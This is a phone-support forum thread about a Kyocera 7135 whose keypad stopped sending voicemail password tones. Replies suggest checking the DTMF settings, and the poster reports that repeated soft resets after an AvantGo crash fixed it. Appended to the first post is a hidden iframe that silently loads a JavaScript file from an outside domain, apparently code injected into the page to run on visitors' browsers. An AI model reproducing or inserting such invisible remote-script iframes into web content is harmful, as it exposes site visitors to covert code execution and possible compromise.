+ Reply to Thread

Can't fetch voice mails/won't take passowords

I had my verizon VM password and my home voice mail password programed into my speed dial. It worked find for weeks. Today I went to retrieve my vm message and the password codes were still there in the speed dial, but nothing happened. It didn't automatically trigger when the vm message came on. Then I tried my home vm, and same thing, the codes that worked fine for weeks just didn't work, although I can still see them programed in the speed dial.

Now I can't even manually input the code, the phone isn't picking up the keypad when I try to manually enter my password into my voice mail systems. I can use the keypad to manually put in a phone number, it won't dial anymore!!??

Can anyone help? Any idea what happened?

Thanks,
    Tracey<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Is it possible the DTMF was turned off?
    Moto Star Tac w/PIM-->Kyocera 6135-->Kyocera 7135-->Samsung i600-->Treo 600-->Treo 650-->Samsung i730-->Treo 700wx-->Treo 750-->Samsung i760

What is the DTMF?

Tracey,

Can you access your voicemail remotely from another phone? I know that Verizon is changing their voicemail system in several areas but don't know if that would affect you.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

I agree. Do you hear tomes(i.e. beeps) when you press the keys? If you don't, check and be sure that the DTMF tones are turned on. Go to Phone Prefs, then Keypad. Set the Length to normal and be sure to set the volume to anything except off. Then go back to Phone mode and press a few keys. You should hear tones now.
    James Kendricks

I didn't hear tones but nothing in prefs was shut down. I got it working finally. It took THREE soft resets.

These were the steps to the incident. I was fooling with Avantgo (ironically, I was reading a post this morning about how Avantgo doesn't work well with the 7135 so I was surfing with it just to see how it went, I don't use the app much), I disconnected from AG, the put the phone in the cradle. About an hour later I went to hotsynch and couldn't, picked up the phone and it said Fatal error and the Avantgo window was still up behind the error window. I reset. The the keypads were dead. I reset, still nothing. I let it sit a half hour, reset again and it brought things back to normal.

Has this happened to anyone else?

Tracey